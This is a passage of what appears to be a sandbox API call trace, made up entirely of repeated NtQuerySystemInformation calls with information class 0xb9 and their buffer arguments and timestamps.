NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x40, ResultLength=0x0) [0258.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x40, ResultLength=0x0) [0258.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.348] NtQuerySystemInformation 